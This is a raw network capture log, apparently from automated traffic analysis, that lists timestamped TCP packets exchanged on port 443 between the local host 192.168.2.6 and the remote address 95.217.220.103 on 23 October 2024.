                                                                                                                                                                                                            Oct 23, 2024 07:03:46.079021931 CEST50002443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:46.079032898 CEST4435000295.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:46.079065084 CEST50002443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:46.079092979 CEST50002443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:46.087868929 CEST4435000295.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:46.087914944 CEST4435000295.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:46.087971926 CEST50002443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:46.087980032 CEST4435000295.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:46.088009119 CEST50002443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:46.088037968 CEST50002443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:46.097570896 CEST4435000295.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:46.097618103 CEST4435000295.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:46.097687960 CEST50002443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:46.097708941 CEST4435000295.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:46.097722054 CEST50002443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:46.097754002 CEST50002443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:46.106986046 CEST4435000295.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:46.107028961 CEST4435000295.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:46.107084990 CEST50002443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:46.107093096 CEST4435000295.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:46.107131958 CEST50002443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:46.107161045 CEST50002443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:46.114814997 CEST4435000295.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:46.114861012 CEST4435000295.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:46.114933014 CEST50002443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:46.114942074 CEST4435000295.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:46.115008116 CEST50002443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:46.123714924 CEST4435000295.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:46.123758078 CEST4435000295.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:46.123802900 CEST50002443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:46.123833895 CEST4435000295.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:46.123845100 CEST50002443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:46.123878002 CEST50002443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:46.132237911 CEST4435000295.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:46.132282019 CEST4435000295.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:46.132322073 CEST50002443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:46.132329941 CEST4435000295.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:46.132366896 CEST50002443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:46.132390022 CEST50002443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:46.139388084 CEST4435000295.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:46.139429092 CEST4435000295.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:46.139466047 CEST50002443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:46.139475107 CEST4435000295.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:46.139529943 CEST50002443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:46.147361994 CEST4435000295.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:46.147407055 CEST4435000295.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:46.147440910 CEST50002443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:46.147448063 CEST4435000295.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:46.147475958 CEST50002443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:46.147500992 CEST50002443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:46.154983997 CEST4435000295.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:46.155025959 CEST4435000295.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:46.155062914 CEST50002443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:46.155117035 CEST4435000295.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:46.155164957 CEST50002443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:46.155188084 CEST50002443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:46.172601938 CEST4435000295.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:46.172647953 CEST4435000295.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:46.172686100 CEST50002443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:46.172693968 CEST4435000295.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:46.172730923 CEST50002443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:46.172756910 CEST50002443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:46.174073935 CEST4435000295.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:46.174117088 CEST4435000295.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:46.174153090 CEST50002443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:46.174160004 CEST4435000295.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:46.174438953 CEST50002443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:46.175909042 CEST4435000295.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:46.175951958 CEST4435000295.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:46.176018953 CEST50002443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:46.176047087 CEST4435000295.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:46.176078081 CEST50002443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:46.176114082 CEST50002443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:46.181226969 CEST4435000295.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:46.181267977 CEST4435000295.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:46.181308031 CEST50002443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:46.181317091 CEST4435000295.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:46.181349039 CEST50002443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:46.181440115 CEST50002443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:46.187195063 CEST4435000295.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:46.187256098 CEST4435000295.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:46.187278986 CEST50002443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:46.187287092 CEST4435000295.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:46.187330961 CEST50002443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:46.187361956 CEST50002443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:46.193439960 CEST4435000295.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:46.193495989 CEST4435000295.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:46.193531990 CEST50002443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:46.193540096 CEST4435000295.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:46.193582058 CEST50002443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:46.193605900 CEST50002443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:46.201601028 CEST4435000295.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:46.201642036 CEST4435000295.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:46.201683044 CEST50002443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:46.201690912 CEST4435000295.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:46.201725960 CEST50002443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:46.201756954 CEST50002443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:46.211260080 CEST4435000295.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:46.211303949 CEST4435000295.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:46.211368084 CEST50002443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:46.211379051 CEST4435000295.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:46.211405039 CEST50002443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:46.211432934 CEST50002443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:46.219733953 CEST4435000295.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:46.219783068 CEST4435000295.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:46.219820976 CEST50002443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:46.219829082 CEST4435000295.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:46.219876051 CEST50002443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:46.220112085 CEST50002443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:46.227663040 CEST4435000295.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:46.227709055 CEST4435000295.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:46.227747917 CEST50002443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:46.227756023 CEST4435000295.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:46.227793932 CEST50002443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:46.227819920 CEST50002443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:46.235266924 CEST4435000295.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:46.235327005 CEST4435000295.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:46.235375881 CEST50002443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:46.235387087 CEST4435000295.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:46.235424995 CEST50002443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:46.235446930 CEST50002443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:46.235469103 CEST4435000295.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:46.235523939 CEST50002443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:46.235752106 CEST50002443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:46.235771894 CEST4435000295.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:46.502619028 CEST50003443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:46.502685070 CEST4435000395.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:46.502856016 CEST50003443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:46.503140926 CEST50003443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:46.503154039 CEST4435000395.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:47.374209881 CEST4435000395.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:47.374464035 CEST50003443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:47.374886036 CEST50003443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:47.374907970 CEST4435000395.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:47.376401901 CEST50003443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:47.376409054 CEST4435000395.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:47.537080050 CEST4434999795.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:47.537151098 CEST49997443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:47.537167072 CEST4434999795.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:47.537209988 CEST4434999795.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:47.537235975 CEST49997443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:47.537261963 CEST49997443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:47.538247108 CEST49997443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:47.538264990 CEST4434999795.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:47.766958952 CEST4435000395.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:47.767019987 CEST4435000395.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:47.767062902 CEST4435000395.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:47.767100096 CEST50003443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:47.767116070 CEST4435000395.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:47.767132044 CEST50003443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:47.767146111 CEST4435000395.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:47.767188072 CEST50003443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:47.767204046 CEST50003443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:47.812439919 CEST4435000395.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:47.812491894 CEST4435000395.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:47.812568903 CEST50003443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:47.812578917 CEST4435000395.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:47.812606096 CEST50003443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:47.812628031 CEST50003443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:47.904345036 CEST4435000395.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:47.904396057 CEST4435000395.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:47.904454947 CEST50003443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:47.904467106 CEST4435000395.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:47.904495955 CEST50003443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:47.904512882 CEST50003443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:47.947741985 CEST4435000395.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:47.947786093 CEST4435000395.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:47.947835922 CEST50003443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:47.947843075 CEST4435000395.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:47.948015928 CEST50003443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:47.948015928 CEST50003443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:47.992999077 CEST4435000395.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:47.993043900 CEST4435000395.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:47.993242979 CEST50003443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:47.993251085 CEST4435000395.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:47.993345976 CEST50003443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:48.033910990 CEST4435000395.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:48.033955097 CEST4435000395.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:48.034060001 CEST50003443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:48.034070015 CEST4435000395.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:48.034148932 CEST50003443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:48.055157900 CEST4435000395.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:48.055203915 CEST4435000395.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:48.055253029 CEST50003443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:48.055259943 CEST4435000395.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:48.055274963 CEST50003443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:48.055341005 CEST50003443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:48.080136061 CEST4435000395.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:48.080152035 CEST4435000395.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:48.080197096 CEST50003443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:48.080203056 CEST4435000395.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:48.080228090 CEST50003443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:48.080239058 CEST50003443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:48.105200052 CEST4435000395.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:48.105215073 CEST4435000395.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:48.106544018 CEST50003443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:48.106554031 CEST4435000395.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:48.106592894 CEST50003443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:48.125408888 CEST4435000395.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:48.125439882 CEST4435000395.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:48.125520945 CEST50003443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:48.125530005 CEST4435000395.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:48.125720978 CEST50003443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:48.148211002 CEST4435000395.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:48.148226023 CEST4435000395.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:48.148391962 CEST50003443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:48.148399115 CEST4435000395.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:48.148442030 CEST50003443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:48.169425011 CEST4435000395.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:48.169440031 CEST4435000395.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:48.169671059 CEST50003443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:48.169678926 CEST4435000395.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:48.169723988 CEST50003443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:48.182926893 CEST4435000395.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:48.182951927 CEST4435000395.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:48.183231115 CEST50003443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:48.183245897 CEST4435000395.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:48.183305025 CEST50003443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:48.195633888 CEST4435000395.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:48.195647955 CEST4435000395.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:48.195823908 CEST50003443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:48.195832968 CEST4435000395.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:48.195882082 CEST50003443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:48.208863974 CEST4435000395.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:48.208879948 CEST4435000395.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:48.208949089 CEST50003443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:48.208960056 CEST4435000395.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:48.209002972 CEST50003443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:48.220309019 CEST4435000395.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:48.220331907 CEST4435000395.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:48.220390081 CEST50003443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:48.220397949 CEST4435000395.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:48.220442057 CEST50003443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:48.231689930 CEST4435000395.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:48.231710911 CEST4435000395.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:48.231820107 CEST50003443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:48.231827974 CEST4435000395.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:48.231882095 CEST50003443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:48.242774010 CEST4435000395.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:48.242791891 CEST4435000395.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:48.242850065 CEST50003443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:48.242856979 CEST4435000395.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:48.242897987 CEST50003443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:48.252542973 CEST4435000395.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:48.252562046 CEST4435000395.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:48.252651930 CEST50003443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:48.252660036 CEST4435000395.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:48.252705097 CEST50003443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:48.261151075 CEST4435000395.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:48.261179924 CEST4435000395.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:48.261236906 CEST50003443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:48.261243105 CEST4435000395.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:48.261277914 CEST50003443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:48.271146059 CEST4435000395.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:48.271174908 CEST4435000395.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:48.271253109 CEST50003443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:48.271261930 CEST4435000395.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:48.271305084 CEST50003443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:48.280378103 CEST4435000395.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:48.280409098 CEST4435000395.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:48.280478001 CEST50003443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:48.280489922 CEST4435000395.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:48.280534983 CEST50003443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:48.288058043 CEST4435000395.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:48.288084984 CEST4435000395.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:48.288132906 CEST50003443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:48.288141012 CEST4435000395.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:48.288161993 CEST50003443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:48.288193941 CEST50003443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:48.296917915 CEST4435000395.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:48.296948910 CEST4435000395.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:48.296988964 CEST50003443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:48.296997070 CEST4435000395.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:48.297014952 CEST50003443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:48.297043085 CEST50003443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:48.306122065 CEST4435000395.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:48.306143045 CEST4435000395.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:48.306199074 CEST50003443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:48.306205988 CEST4435000395.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:48.306245089 CEST50003443192.168.2.695.217.220.103
